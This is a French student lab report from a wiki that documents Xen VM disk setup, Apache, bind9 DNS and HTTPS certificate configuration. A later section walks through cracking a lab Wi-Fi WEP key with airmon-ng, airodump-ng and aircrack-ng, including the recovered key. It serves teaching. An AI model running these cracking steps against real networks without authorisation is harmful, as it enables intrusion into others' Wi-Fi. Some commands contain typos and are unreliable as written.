On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
